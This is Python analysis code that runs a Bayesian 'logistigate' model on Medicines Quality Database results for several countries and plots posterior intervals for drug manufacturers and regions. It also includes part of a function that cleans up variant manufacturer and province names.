for label in (ax.get_xticklabels() + ax.get_yticklabels()):
label.set_fontname('Times New Roman')
label.set_fontsize(11)
fig.tight_layout()
plt.show()
plt.close()
util.Summarize(logistigateDict_CAM_antimalarial)
# Run with Ethiopia provinces
dataTblDict_ETH = util.testresultsfiletotable('MQDfiles/MQD_ETHIOPIA.csv')
countryMean = np.sum(dataTblDict_ETH['Y']) / np.sum(dataTblDict_ETH['N'])
dataTblDict_ETH.update({'diagSens': 1.0,
'diagSpec': 1.0,
'numPostSamples': 500,
'prior': methods.prior_normal(mu=sps.logit(countryMean)),
'MCMCdict': MCMCdict})
logistigateDict_ETH = lg.runlogistigate(dataTblDict_ETH)
util.plotPostSamples(logistigateDict_ETH)
util.printEstimates(logistigateDict_ETH)
# Run with Ghana provinces
dataTblDict_GHA = util.testresultsfiletotable(dataDict['dataTbl_GHA'], csvName=False)
#dataTblDict_GHA = util.testresultsfiletotable('MQDfiles/MQD_GHANA.csv')
countryMean = np.sum(dataTblDict_GHA['Y']) / np.sum(dataTblDict_GHA['N'])
dataTblDict_GHA.update({'diagSens': 1.0,
'diagSpec': 1.0,
'numPostSamples': 1000,
'prior': methods.prior_normal(mu=sps.logit(countryMean)),
'MCMCdict': MCMCdict})
logistigateDict_GHA = lg.runlogistigate(dataTblDict_GHA)
util.plotPostSamples(logistigateDict_GHA, plotType='int90',
subTitleStr=['\nGhana', '\nGhana'])
util.printEstimates(logistigateDict_GHA)
# Plot importers subset where median sample is above 0.4
totalEntities = logistigateDict_GHA['importerNum'] + logistigateDict_GHA['outletNum']
sampMedians = [np.median(logistigateDict_GHA['postSamples'][:, i]) for i in range(totalEntities)]
highImporterInds = [i for i, x in enumerate(sampMedians[:logistigateDict_GHA['importerNum']]) if x > 0.4]
highOutletInds = [i for i, x in enumerate(sampMedians[logistigateDict_GHA['importerNum']:]) if x > 0.15]
util.plotPostSamples(logistigateDict_GHA, importerIndsSubset=highImporterInds,
outletIndsSubset=highOutletInds,
subTitleStr=['\nGhana - Subset', '\nGhana - Subset'])
util.printEstimates(logistigateDict_GHA, importerIndsSubset=highImporterInds,outletIndsSubset=highOutletInds)
# Run with Ghana provinces filtered for outlet-type samples
dataTblDict_GHA_filt = util.testresultsfiletotable(dataDict['dataTbl_GHA_filt'], csvName=False)
#dataTblDict_GHA_filt = util.testresultsfiletotable('MQDfiles/MQD_GHANA_FACILITYFILTER.csv')
countryMean = np.sum(dataTblDict_GHA_filt['Y']) / np.sum(dataTblDict_GHA_filt['N'])
dataTblDict_GHA_filt.update({'diagSens': 1.0,
'diagSpec': 1.0,
'numPostSamples': 1000,
'prior': methods.prior_normal(mu=sps.logit(countryMean)),
'MCMCdict': MCMCdict})
logistigateDict_GHA_filt = lg.runlogistigate(dataTblDict_GHA_filt)
util.plotPostSamples(logistigateDict_GHA_filt, plotType='int90',
subTitleStr=['\nGhana (filtered)', '\nGhana (filtered)'])
util.printEstimates(logistigateDict_GHA_filt)
# Run with Ghana provinces filtered for antimalarials
dataTblDict_GHA_antimalarial = util.testresultsfiletotable(dataDict['dataTbl_GHA_antimalarial'], csvName=False)
#dataTblDict_GHA_antimalarial = util.testresultsfiletotable('MQDfiles/MQD_GHANA_ANTIMALARIAL.csv')
countryMean = np.sum(dataTblDict_GHA_antimalarial['Y']) / np.sum(dataTblDict_GHA_antimalarial['N'])
dataTblDict_GHA_antimalarial.update({'diagSens': 1.0,
'diagSpec': 1.0,
'numPostSamples': 1000,
'prior': methods.prior_normal(mu=sps.logit(countryMean)),
'MCMCdict': MCMCdict})
logistigateDict_GHA_antimalarial = lg.runlogistigate(dataTblDict_GHA_antimalarial)
#util.plotPostSamples(logistigateDict_GHA_antimalarial, plotType='int90',
# subTitleStr=['\nGhana (Antimalarials)', '\nGhana (Antimalarials)'])
#util.printEstimates(logistigateDict_GHA_antimalarial)
# Special plotting for these data sets
numImp, numOut = logistigateDict_GHA_antimalarial['importerNum'], logistigateDict_GHA_antimalarial['outletNum']
lowerQuant, upperQuant = 0.05, 0.95
intStr = '90'
priorSamps = logistigateDict_GHA_antimalarial['prior'].expitrand(5000)
priorLower, priorUpper = np.quantile(priorSamps, lowerQuant), np.quantile(priorSamps, upperQuant)
importerIndsSubset = range(numImp)
impNames = [logistigateDict_GHA_antimalarial['importerNames'][i] for i in importerIndsSubset]
impLowers = [np.quantile(logistigateDict_GHA_antimalarial['postSamples'][:, l], lowerQuant) for l in
importerIndsSubset]
impUppers = [np.quantile(logistigateDict_GHA_antimalarial['postSamples'][:, l], upperQuant) for l in
importerIndsSubset]
midpoints = [impUppers[i] - (impUppers[i] - impLowers[i]) / 2 for i in range(len(impUppers))]
zippedList = zip(midpoints, impUppers, impLowers, impNames)
sorted_pairs = sorted(zippedList, reverse=True)
impNamesSorted = [tup[3] for tup in sorted_pairs]
impNamesSorted.append('')
impNamesSorted.append('(Prior)')
# Plot
import matplotlib.pyplot as plt
fig, (ax) = plt.subplots(figsize=(10, 10), ncols=1)
sorted_pairs.append((np.nan, np.nan, np.nan, ' ')) # for spacing
for _, upper, lower, name in sorted_pairs:
plt.plot((name, name), (lower, upper), 'o-', color='red')
plt.plot((impNamesSorted[-1], impNamesSorted[-1]), (priorLower, priorUpper), 'o--', color='gray')
plt.ylim([0, 1])
plt.xticks(range(len(impNamesSorted)), impNamesSorted, rotation=90)
plt.title('Manufacturers - ' + intStr + '% Intervals' + '\nGhana Antimalarials',
fontdict={'fontsize': 18, 'fontname': 'Trebuchet MS'})
plt.xlabel('Manufacturer Name', fontdict={'fontsize': 14, 'fontname': 'Trebuchet MS'})
plt.ylabel('Interval value', fontdict={'fontsize': 14, 'fontname': 'Trebuchet MS'})
for label in (ax.get_xticklabels() + ax.get_yticklabels()):
label.set_fontname('Times New Roman')
label.set_fontsize(9)
fig.tight_layout()
plt.show()
plt.close()
outletIndsSubset = range(numOut)
outNames = [logistigateDict_GHA_antimalarial['outletNames'][i][6:] for i in outletIndsSubset]
outNames[7] = 'Western'
outLowers = [np.quantile(logistigateDict_GHA_antimalarial['postSamples'][:, numImp + l], lowerQuant) for l in
outletIndsSubset]
outUppers = [np.quantile(logistigateDict_GHA_antimalarial['postSamples'][:, numImp + l], upperQuant) for l in
outletIndsSubset]
midpoints = [outUppers[i] - (outUppers[i] - outLowers[i]) / 2 for i in range(len(outUppers))]
zippedList = zip(midpoints, outUppers, outLowers, outNames)
sorted_pairs = sorted(zippedList, reverse=True)
outNamesSorted = [tup[3] for tup in sorted_pairs]
outNamesSorted.append('')
outNamesSorted.append('(Prior)')
# Plot
fig, (ax) = plt.subplots(figsize=(8, 10), ncols=1)
sorted_pairs.append((np.nan, np.nan, np.nan, ' ')) # for spacing
for _, upper, lower, name in sorted_pairs:
plt.plot((name, name), (lower, upper), 'o-', color='purple')
plt.plot((outNamesSorted[-1], outNamesSorted[-1]), (priorLower, priorUpper), 'o--', color='gray')
plt.ylim([0, 1])
plt.xticks(range(len(outNamesSorted)), outNamesSorted, rotation=90)
plt.title('Regional Aggregates - ' + intStr + '% Intervals' + '\nGhana Antimalarials',
fontdict={'fontsize': 18, 'fontname': 'Trebuchet MS'})
plt.xlabel('Regional Aggregate', fontdict={'fontsize': 14, 'fontname': 'Trebuchet MS'})
plt.ylabel('Interval value', fontdict={'fontsize': 14, 'fontname': 'Trebuchet MS'})
for label in (ax.get_xticklabels() + ax.get_yticklabels()):
label.set_fontname('Times New Roman')
label.set_fontsize(11)
fig.tight_layout()
plt.show()
plt.close()
util.Summarize(logistigateDict_GHA_antimalarial)
# Run with Kenya provinces
dataTblDict_KEN = util.testresultsfiletotable('MQDfiles/MQD_KENYA.csv')
countryMean = np.sum(dataTblDict_KEN['Y']) / np.sum(dataTblDict_KEN['N'])
dataTblDict_KEN.update({'diagSens': 1.0,
'diagSpec': 1.0,
'numPostSamples': 500,
'prior': methods.prior_normal(mu=sps.logit(countryMean)),
'MCMCdict': MCMCdict})
logistigateDict_KEN = lg.runlogistigate(dataTblDict_KEN)
util.plotPostSamples(logistigateDict_KEN)
util.printEstimates(logistigateDict_KEN)
# Run with Laos provinces
dataTblDict_LAO = util.testresultsfiletotable('MQDfiles/MQD_LAOS.csv')
countryMean = np.sum(dataTblDict_LAO['Y']) / np.sum(dataTblDict_LAO['N'])
dataTblDict_LAO.update({'diagSens': 1.0,
'diagSpec': 1.0,
'numPostSamples': 500,
'prior': methods.prior_normal(mu=sps.logit(countryMean)),
'MCMCdict': MCMCdict})
logistigateDict_LAO = lg.runlogistigate(dataTblDict_LAO)
util.plotPostSamples(logistigateDict_LAO)
util.printEstimates(logistigateDict_LAO)
# Run with Mozambique provinces
dataTblDict_MOZ = util.testresultsfiletotable('MQDfiles/MQD_MOZAMBIQUE.csv')
countryMean = np.sum(dataTblDict_MOZ['Y']) / np.sum(dataTblDict_MOZ['N'])
dataTblDict_MOZ.update({'diagSens': 1.0,
'diagSpec': 1.0,
'numPostSamples': 500,
'prior': methods.prior_normal(mu=sps.logit(countryMean)),
'MCMCdict': MCMCdict})
logistigateDict_MOZ = lg.runlogistigate(dataTblDict_MOZ)
util.plotPostSamples(logistigateDict_MOZ)
util.printEstimates(logistigateDict_MOZ)
# Run with Nigeria provinces
dataTblDict_NIG = util.testresultsfiletotable('MQDfiles/MQD_NIGERIA.csv')
countryMean = np.sum(dataTblDict_NIG['Y']) / np.sum(dataTblDict_NIG['N'])
dataTblDict_NIG.update({'diagSens': 1.0,
'diagSpec': 1.0,
'numPostSamples': 500,
'prior': methods.prior_normal(mu=sps.logit(countryMean)),
'MCMCdict': MCMCdict})
logistigateDict_NIG = lg.runlogistigate(dataTblDict_NIG)
util.plotPostSamples(logistigateDict_NIG)
util.printEstimates(logistigateDict_NIG)
# Run with Peru provinces
dataTblDict_PER = util.testresultsfiletotable('MQDfiles/MQD_PERU.csv')
countryMean = np.sum(dataTblDict_PER['Y']) / np.sum(dataTblDict_PER['N'])
dataTblDict_PER.update({'diagSens': 1.0,
'diagSpec': 1.0,
'numPostSamples': 1000,
'prior': methods.prior_normal(mu=sps.logit(countryMean)),
'MCMCdict': MCMCdict})
logistigateDict_PER = lg.runlogistigate(dataTblDict_PER)
numPeruImps_half = int(np.floor(logistigateDict_PER['importerNum']/2))
util.plotPostSamples(logistigateDict_PER, plotType='int90',
importerIndsSubset=np.arange(0,numPeruImps_half).tolist(), subTitleStr=['\nPeru - 1st Half', '\nPeru'])
util.plotPostSamples(logistigateDict_PER, plotType='int90',
importerIndsSubset=np.arange(numPeruImps_half,logistigateDict_PER['importerNum']).tolist(),
subTitleStr=['\nPeru - 2nd Half', '\nPeru'])
util.printEstimates(logistigateDict_PER)
# Plot importers subset where median sample is above 0.4
totalEntities = logistigateDict_PER['importerNum'] + logistigateDict_PER['outletNum']
sampMedians = [np.median(logistigateDict_PER['postSamples'][:, i]) for i in range(totalEntities)]
highImporterInds = [i for i, x in enumerate(sampMedians[:logistigateDict_PER['importerNum']]) if x > 0.4]
highImporterInds = [highImporterInds[i] for i in [3,6,7,8,9,12,13,16]] # Only manufacturers with more than 1 sample
highOutletInds = [i for i, x in enumerate(sampMedians[logistigateDict_PER['importerNum']:]) if x > 0.12]
util.plotPostSamples(logistigateDict_PER, importerIndsSubset=highImporterInds,
outletIndsSubset=highOutletInds,
subTitleStr=['\nPeru - Subset', '\nPeru - Subset'])
util.printEstimates(logistigateDict_PER, importerIndsSubset=highImporterInds, outletIndsSubset=highOutletInds)
# Run with Peru provinces filtered for outlet-type samples
dataTblDict_PER_filt = util.testresultsfiletotable('MQDfiles/MQD_PERU_FACILITYFILTER.csv')
countryMean = np.sum(dataTblDict_PER_filt['Y']) / np.sum(dataTblDict_PER_filt['N'])
dataTblDict_PER_filt.update({'diagSens': 1.0,
'diagSpec': 1.0,
'numPostSamples': 1000,
'prior': methods.prior_normal(mu=sps.logit(countryMean)),
'MCMCdict': MCMCdict})
logistigateDict_PER_filt = lg.runlogistigate(dataTblDict_PER_filt)
numPeruImps_half = int(np.floor(logistigateDict_PER_filt['importerNum'] / 2))
util.plotPostSamples(logistigateDict_PER_filt, plotType='int90',
importerIndsSubset=np.arange(0, numPeruImps_half).tolist(),
subTitleStr=['\nPeru - 1st Half (filtered)', '\nPeru (filtered)'])
util.plotPostSamples(logistigateDict_PER_filt, plotType='int90',
importerIndsSubset=np.arange(numPeruImps_half, logistigateDict_PER_filt['importerNum']).tolist(),
subTitleStr=['\nPeru - 2nd Half (filtered)', '\nPeru (filtered)'])
util.printEstimates(logistigateDict_PER_filt)
# Run with Peru provinces filtered for antibiotics
dataTblDict_PER_antibiotics = util.testresultsfiletotable('MQDfiles/MQD_PERU_ANTIBIOTIC.csv')
countryMean = np.sum(dataTblDict_PER_antibiotics['Y']) / np.sum(dataTblDict_PER_antibiotics['N'])
dataTblDict_PER_antibiotics.update({'diagSens': 1.0,
'diagSpec': 1.0,
'numPostSamples': 1000,
'prior': methods.prior_normal(mu=sps.logit(countryMean)),
'MCMCdict': MCMCdict})
logistigateDict_PER_antibiotics = lg.runlogistigate(dataTblDict_PER_antibiotics)
numPeruImps_half = int(np.floor(logistigateDict_PER_antibiotics['importerNum'] / 2))
util.plotPostSamples(logistigateDict_PER_antibiotics, plotType='int90',
importerIndsSubset=np.arange(numPeruImps_half).tolist(),
subTitleStr=['\nPeru - 1st Half (Antibiotics)', '\nPeru (Antibiotics)'])
util.plotPostSamples(logistigateDict_PER_antibiotics, plotType='int90',
importerIndsSubset=np.arange(numPeruImps_half, logistigateDict_PER_antibiotics['importerNum']).tolist(),
subTitleStr=['\nPeru - 2nd Half (Antibiotics)', '\nPeru (Antibiotics)'])
util.printEstimates(logistigateDict_PER_antibiotics)
# Run with Philippines provinces
dataTblDict_PHI = util.testresultsfiletotable(dataDict['dataTbl_PHI'], csvName=False)
#dataTblDict_PHI = util.testresultsfiletotable('MQDfiles/MQD_PHILIPPINES.csv')
countryMean = np.sum(dataTblDict_PHI['Y']) / np.sum(dataTblDict_PHI['N'])
dataTblDict_PHI.update({'diagSens': 1.0,
'diagSpec': 1.0,
'numPostSamples': 1000,
'prior': methods.prior_normal(mu=sps.logit(countryMean)),
'MCMCdict': MCMCdict})
logistigateDict_PHI = lg.runlogistigate(dataTblDict_PHI)
util.plotPostSamples(logistigateDict_PHI,plotType='int90',subTitleStr=['\nPhilippines','\nPhilippines'])
util.printEstimates(logistigateDict_PHI)
# Plot importers subset where median sample is above 0.1
totalEntities = logistigateDict_PHI['importerNum'] + logistigateDict_PHI['outletNum']
sampMedians = [np.median(logistigateDict_PHI['postSamples'][:, i]) for i in range(totalEntities)]
highImporterInds = [i for i, x in enumerate(sampMedians[:logistigateDict_PHI['importerNum']]) if x > 0.1]
#highImporterInds = [highImporterInds[i] for i in
# [3, 6, 7, 8, 9, 12, 13, 16]] # Only manufacturers with more than 1 sample
highOutletInds = [i for i, x in enumerate(sampMedians[logistigateDict_PHI['importerNum']:]) if x > 0.1]
#util.plotPostSamples(logistigateDict_PHI, importerIndsSubset=highImporterInds,
# outletIndsSubset=highOutletInds,
# subTitleStr=['\nPhilippines - Subset', '\nPhilippines - Subset'])
# Special plotting for these data sets
numImp, numOut = logistigateDict_PHI['importerNum'], logistigateDict_PHI['outletNum']
lowerQuant, upperQuant = 0.05, 0.95
intStr = '90'
priorSamps = logistigateDict_PHI['prior'].expitrand(5000)
priorLower, priorUpper = np.quantile(priorSamps, lowerQuant), np.quantile(priorSamps, upperQuant)
importerIndsSubset = range(numImp)
impNames = [logistigateDict_PHI['importerNames'][i] for i in importerIndsSubset]
impLowers = [np.quantile(logistigateDict_PHI['postSamples'][:, l], lowerQuant) for l in
importerIndsSubset]
impUppers = [np.quantile(logistigateDict_PHI['postSamples'][:, l], upperQuant) for l in
importerIndsSubset]
midpoints = [impUppers[i] - (impUppers[i] - impLowers[i]) / 2 for i in range(len(impUppers))]
zippedList = zip(midpoints, impUppers, impLowers, impNames)
sorted_pairs = sorted(zippedList, reverse=True)
impNamesSorted = [tup[3] for tup in sorted_pairs]
impNamesSorted.append('')
impNamesSorted.append('(Prior)')
# Plot
import matplotlib.pyplot as plt
fig, (ax) = plt.subplots(figsize=(10, 10), ncols=1)
sorted_pairs.append((np.nan, np.nan, np.nan, ' ')) # for spacing
for _, upper, lower, name in sorted_pairs:
plt.plot((name, name), (lower, upper), 'o-', color='red')
plt.plot((impNamesSorted[-1], impNamesSorted[-1]), (priorLower, priorUpper), 'o--', color='gray')
plt.ylim([0, 1])
plt.xticks(range(len(impNamesSorted)), impNamesSorted, rotation=90)
plt.title('Manufacturers - ' + intStr + '% Intervals' + '\nPhilippines Anti-tuberculosis Medicines',
fontdict={'fontsize': 18, 'fontname': 'Trebuchet MS'})
plt.xlabel('Manufacturer Name', fontdict={'fontsize': 14, 'fontname': 'Trebuchet MS'})
plt.ylabel('Interval value', fontdict={'fontsize': 14, 'fontname': 'Trebuchet MS'})
for label in (ax.get_xticklabels() + ax.get_yticklabels()):
label.set_fontname('Times New Roman')
label.set_fontsize(9)
fig.tight_layout()
plt.show()
plt.close()
outletIndsSubset = range(numOut)
outNames = [logistigateDict_PHI['outletNames'][i] for i in outletIndsSubset]
outLowers = [np.quantile(logistigateDict_PHI['postSamples'][:, numImp + l], lowerQuant) for l in
outletIndsSubset]
outUppers = [np.quantile(logistigateDict_PHI['postSamples'][:, numImp + l], upperQuant) for l in
outletIndsSubset]
midpoints = [outUppers[i] - (outUppers[i] - outLowers[i]) / 2 for i in range(len(outUppers))]
zippedList = zip(midpoints, outUppers, outLowers, outNames)
sorted_pairs = sorted(zippedList, reverse=True)
outNamesSorted = [tup[3] for tup in sorted_pairs]
outNamesSorted.append('')
outNamesSorted.append('(Prior)')
# Plot
fig, (ax) = plt.subplots(figsize=(8, 10), ncols=1)
sorted_pairs.append((np.nan, np.nan, np.nan, ' ')) # for spacing
for _, upper, lower, name in sorted_pairs:
plt.plot((name, name), (lower, upper), 'o-', color='purple')
plt.plot((outNamesSorted[-1], outNamesSorted[-1]), (priorLower, priorUpper), 'o--', color='gray')
plt.ylim([0, 1])
plt.xticks(range(len(outNamesSorted)), outNamesSorted, rotation=90)
plt.title('Regional Aggregates - ' + intStr + '% Intervals' + '\nPhilippines Anti-tuberculosis Medicines',
fontdict={'fontsize': 18, 'fontname': 'Trebuchet MS'})
plt.xlabel('Regional Aggregate', fontdict={'fontsize': 14, 'fontname': 'Trebuchet MS'})
plt.ylabel('Interval value', fontdict={'fontsize': 14, 'fontname': 'Trebuchet MS'})
for label in (ax.get_xticklabels() + ax.get_yticklabels()):
label.set_fontname('Times New Roman')
label.set_fontsize(11)
fig.tight_layout()
plt.show()
plt.close()
util.Summarize(logistigateDict_PHI)
util.printEstimates(logistigateDict_PHI, importerIndsSubset=highImporterInds, outletIndsSubset=highOutletInds)
# Run with Philippines provinces filtered for outlet-type samples
dataTblDict_PHI_filt = util.testresultsfiletotable('MQDfiles/MQD_PHILIPPINES_FACILITYFILTER.csv')
countryMean = np.sum(dataTblDict_PHI_filt['Y']) / np.sum(dataTblDict_PHI_filt['N'])
dataTblDict_PHI_filt.update({'diagSens': 1.0,
'diagSpec': 1.0,
'numPostSamples': 1000,
'prior': methods.prior_normal(mu=sps.logit(countryMean)),
'MCMCdict': MCMCdict})
logistigateDict_PHI_filt = lg.runlogistigate(dataTblDict_PHI_filt)
util.plotPostSamples(logistigateDict_PHI_filt, plotType='int90', subTitleStr=['\nPhilippines (filtered)', '\nPhilippines (filtered)'])
util.printEstimates(logistigateDict_PHI_filt)
# Run with Thailand provinces
dataTblDict_THA = util.testresultsfiletotable('MQDfiles/MQD_THAILAND.csv')
countryMean = np.sum(dataTblDict_THA['Y']) / np.sum(dataTblDict_THA['N'])
dataTblDict_THA.update({'diagSens': 1.0,
'diagSpec': 1.0,
'numPostSamples': 500,
'prior': methods.prior_normal(mu=sps.logit(countryMean)),
'MCMCdict': MCMCdict})
logistigateDict_THA = lg.runlogistigate(dataTblDict_THA)
util.plotPostSamples(logistigateDict_THA)
util.printEstimates(logistigateDict_THA)
# Run with Viet Nam provinces
dataTblDict_VIE = util.testresultsfiletotable('MQDfiles/MQD_VIETNAM.csv')
countryMean = np.sum(dataTblDict_VIE['Y']) / np.sum(dataTblDict_VIE['N'])
dataTblDict_VIE.update({'diagSens': 1.0,
'diagSpec': 1.0,
'numPostSamples': 500,
'prior': methods.prior_normal(mu=sps.logit(countryMean)),
'MCMCdict': MCMCdict})
logistigateDict_VIE = lg.runlogistigate(dataTblDict_VIE)
util.plotPostSamples(logistigateDict_VIE)
util.printEstimates(logistigateDict_VIE)
return
| 62.53666 | 140 | 0.650975 | # Workaround for the 'methods' file not being able to locate the 'mcmcsamplers' folder for importing
import sys
import os
SCRIPT_DIR = os.path.dirname(os.path.realpath(os.path.join(os.getcwd(), os.path.expanduser(__file__))))
sys.path.append(os.path.normpath(os.path.join(SCRIPT_DIR, '../logistigate', 'logistigate')))
sys.path.append(os.path.normpath(os.path.join(SCRIPT_DIR, '../logistigate', 'logistigate', 'mcmcsamplers')))
import logistigate.logistigate.utilities as util # Pull from the submodule "develop" branch
import logistigate.logistigate.methods as methods # Pull from the submodule "develop" branch
import logistigate.logistigate.lg as lg # Pull from the submodule "develop" branch
def cleanMQD():
'''
Script that cleans up raw Medicines Quality Database data for use in logistigate.
It reads in a CSV file with columns 'Country,' 'Province,' 'Therapeutic Indication',
'Manufacturer,' 'Facility Type', 'Date Sample Collected', 'Final Test Result,' and
'Type of Test', and returns a dictionary of objects to be formatted for use with logistigate.
'''
# Read in the raw database file
import pandas as pd
SCRIPT_DIR = os.path.dirname(os.path.realpath(os.path.join(os.getcwd(), os.path.expanduser(__file__))))
filesPath = os.path.join(SCRIPT_DIR, '../MQDfiles')
MQD_df = pd.read_csv(os.path.join(filesPath,'MQD_ALL_CSV.csv')) # Main raw database file
# Get data particular to each country of interest
MQD_df_CAM = MQD_df[MQD_df['Country'] == 'Cambodia'].copy()
MQD_df_GHA = MQD_df[MQD_df['Country'] == 'Ghana'].copy()
MQD_df_PHI = MQD_df[MQD_df['Country'] == 'Philippines'].copy()
# Consolidate typos or seemingly identical entries in significant categories
# Cambodia
# Province
MQD_df_CAM.loc[
(MQD_df_CAM.Province == 'Ratanakiri') | (MQD_df_CAM.Province == 'Rattanakiri'), 'Province'] = 'Ratanakiri'
MQD_df_CAM.loc[
(MQD_df_CAM.Province == 'Steung Treng') | (MQD_df_CAM.Province == 'Stung Treng'), 'Province'] = 'Stung Treng'
# Manufacturer
MQD_df_CAM.loc[
(MQD_df_CAM.Manufacturer == 'Acdhon Co., Ltd') | (MQD_df_CAM.Manufacturer == 'Acdhon Company Ltd'),
'Manufacturer'] = 'Acdhon Co., Ltd'
MQD_df_CAM.loc[
(MQD_df_CAM.Manufacturer == 'Alembic Limited') | (MQD_df_CAM.Manufacturer == 'Alembic Pharmaceuticals Ltd'),
'Manufacturer'] = 'Alembic Limited'
MQD_df_CAM.loc[
(MQD_df_CAM.Manufacturer == 'ALICE PHARMA PVT LTD') | (MQD_df_CAM.Manufacturer == 'Alice Pharma Pvt.Ltd')
| (MQD_df_CAM.Manufacturer == 'Alice Pharmaceuticals'), 'Manufacturer'] = 'Alice Pharmaceuticals'
MQD_df_CAM.loc[
(MQD_df_CAM.Manufacturer == 'Atoz Pharmaceutical Pvt.Ltd') | (MQD_df_CAM.Manufacturer == 'Atoz Pharmaceuticals Ltd'),
'Manufacturer'] = 'Atoz Pharmaceuticals Ltd'
MQD_df_CAM.loc[
(MQD_df_CAM.Manufacturer == 'Aurobindo Pharma LTD') | (MQD_df_CAM.Manufacturer == 'Aurobindo Pharma Ltd.')
| (MQD_df_CAM.Manufacturer == 'Aurobindo Pharmaceuticals Ltd'), 'Manufacturer'] = 'Aurobindo'
MQD_df_CAM.loc[
(MQD_df_CAM.Manufacturer == 'Aventis') | (MQD_df_CAM.Manufacturer == 'Aventis Pharma Specialite'),
'Manufacturer'] = 'Aventis'
MQD_df_CAM.loc[
(MQD_df_CAM.Manufacturer == 'Bright Future Laboratories') | (MQD_df_CAM.Manufacturer == 'Bright Future Pharma'),
'Manufacturer'] = 'Bright Future Laboratories'
MQD_df_CAM.loc[
(MQD_df_CAM.Manufacturer == 'Burapha') | (MQD_df_CAM.Manufacturer == 'Burapha Dispensary Co, Ltd'),
'Manufacturer'] = 'Burapha'
MQD_df_CAM.loc[
(MQD_df_CAM.Manufacturer == 'CHANKIT') | (MQD_df_CAM.Manufacturer == 'Chankit Trading Ltd')
| (MQD_df_CAM.Manufacturer == 'Chankit trading Ltd, Part'),
'Manufacturer'] = 'Chankit Trading Ltd'
MQD_df_CAM.loc[
(MQD_df_CAM.Manufacturer == 'Chea Chamnan Laboratoire Co., LTD') | (MQD_df_CAM.Manufacturer == 'Chea Chamnan Laboratories Co., Ltd')
| (MQD_df_CAM.Manufacturer == 'Chea Chamnan Laboratory Company Ltd'),
'Manufacturer'] = 'Chea Chamnan Laboratory Company Ltd'
MQD_df_CAM.loc[
(MQD_df_CAM.Manufacturer == 'Cipla Ltd.') | (MQD_df_CAM.Manufacturer == 'Cipla Ltd'),
'Manufacturer'] = 'Cipla Ltd'
MQD_df_CAM.loc[
(MQD_df_CAM.Manufacturer == 'DOMESCO MEDICAL IMP EXP JOINT STOCK CORP')
| (MQD_df_CAM.Manufacturer == 'DOMESCO MEDICAL IMP EXP JOINT_stock corp')
| (MQD_df_CAM.Manufacturer == 'DOMESCO MEDICAL IMPORT EXPORT JOINT STOCK CORP')
| (MQD_df_CAM.Manufacturer == 'Domesco'),
'Manufacturer'] = 'Domesco'
MQD_df_CAM.loc[
(MQD_df_CAM.Manufacturer == 'Emcure Pharmaceutical') | (MQD_df_CAM.Manufacturer == 'Emcure'),
'Manufacturer'] = 'Emcure'
MQD_df_CAM.loc[
(MQD_df_CAM.Manufacturer == 'Eurolife Healthcare Pvt Ltd') | (MQD_df_CAM.Manufacturer == 'Eurolife'),
'Manufacturer'] = 'Eurolife'
MQD_df_CAM.loc[
(MQD_df_CAM.Manufacturer == 'Flamingo Pharmaceutical Limited') | (MQD_df_CAM.Manufacturer == 'Flamingo Pharmaceuticals Ltd'),
'Manufacturer'] = 'Flamingo Pharmaceuticals Ltd'
MQD_df_CAM.loc[
(MQD_df_CAM.Manufacturer == 'Global Pharma Health care PVT-LTD')
| (MQD_df_CAM.Manufacturer == 'GlobalPharma Healthcare Pvt-Ltd')
| (MQD_df_CAM.Manufacturer == 'Global Pharma'),
'Manufacturer'] = 'Global Pharma'
MQD_df_CAM.loc[
(MQD_df_CAM.Manufacturer == 'Gracure Pharmaceuticals Ltd.') | (MQD_df_CAM.Manufacturer == 'Gracure Pharmaceuticals'),
'Manufacturer'] = 'Gracure Pharmaceuticals'
MQD_df_CAM.loc[
(MQD_df_CAM.Manufacturer == 'Il Dong Pharmaceutical Company Ltd') | (MQD_df_CAM.Manufacturer == 'Il Dong Pharmaceuticals Ltd'),
'Manufacturer'] = 'Il Dong Pharmaceuticals Ltd'
MQD_df_CAM.loc[
(MQD_df_CAM.Manufacturer == 'Khandelwal Laboratories Ltd')
| (MQD_df_CAM.Manufacturer == 'Khandewal Lab')
| (MQD_df_CAM.Manufacturer == 'Khandelwal'),
'Manufacturer'] = 'Khandelwal'
MQD_df_CAM.loc[
(MQD_df_CAM.Manufacturer == 'Laboratories EPHAC Co., Ltd')
| (MQD_df_CAM.Manufacturer == 'EPHAC Laboratories Ltd'),
'Manufacturer'] = 'Laboratories EPHAC Co., Ltd'
MQD_df_CAM.loc[
(MQD_df_CAM.Manufacturer == 'Lyka Laboratories Ltd')
| (MQD_df_CAM.Manufacturer == 'Lyka Labs Limited.')
| (MQD_df_CAM.Manufacturer == 'Lyka Labs'),
'Manufacturer'] = 'Lyka Labs'
MQD_df_CAM.loc[
(MQD_df_CAM.Manufacturer == 'Marksans Pharmaceuticals Ltd') | (MQD_df_CAM.Manufacturer == 'Marksans Pharma Ltd.')
| (MQD_df_CAM.Manufacturer == 'Marksans Pharma Ltd.,'),
'Manufacturer'] = 'Marksans Pharma Ltd.'
MQD_df_CAM.loc[
(MQD_df_CAM.Manufacturer == 'MASALAB') | (MQD_df_CAM.Manufacturer == 'Masa Lab Co., Ltd'),
'Manufacturer'] = 'Masa Lab Co., Ltd'
MQD_df_CAM.loc[
(MQD_df_CAM.Manufacturer == 'Medical Supply Pharmaceutical Enterprise')
| (MQD_df_CAM.Manufacturer == 'Medical Supply Pharmaceutical Enteprise'),
'Manufacturer'] = 'Medical Supply Pharmaceutical Enterprise'
MQD_df_CAM.loc[
(MQD_df_CAM.Manufacturer == 'Medopharm Pvt. Ltd.')
| (MQD_df_CAM.Manufacturer == 'Medopharm'),
'Manufacturer'] = 'Medopharm'
MQD_df_CAM.loc[
(MQD_df_CAM.Manufacturer == 'Micro Laboratories Ltd') | (MQD_df_CAM.Manufacturer == 'MICRO LAB LIMITED')
| (MQD_df_CAM.Manufacturer == 'Micro Labs Ltd') | (MQD_df_CAM.Manufacturer == 'Microlabs Limited'),
'Manufacturer'] = 'Microlabs'
MQD_df_CAM.loc[
(MQD_df_CAM.Manufacturer == 'Millimed Co., Ltd Thailand')
| (MQD_df_CAM.Manufacturer == 'Millimed'),
'Manufacturer'] = 'Millimed'
MQD_df_CAM.loc[
(MQD_df_CAM.Manufacturer == 'Orchid Health Care') | (MQD_df_CAM.Manufacturer == 'Orchid Health'),
'Manufacturer'] = 'Orchid Health'
MQD_df_CAM.loc[
(MQD_df_CAM.Manufacturer == 'Osoth Inter Laboratory Co., LTD') | (MQD_df_CAM.Manufacturer == 'Osoth Inter Laboratories'),
'Manufacturer'] = 'Osoth Inter Laboratories'
MQD_df_CAM.loc[
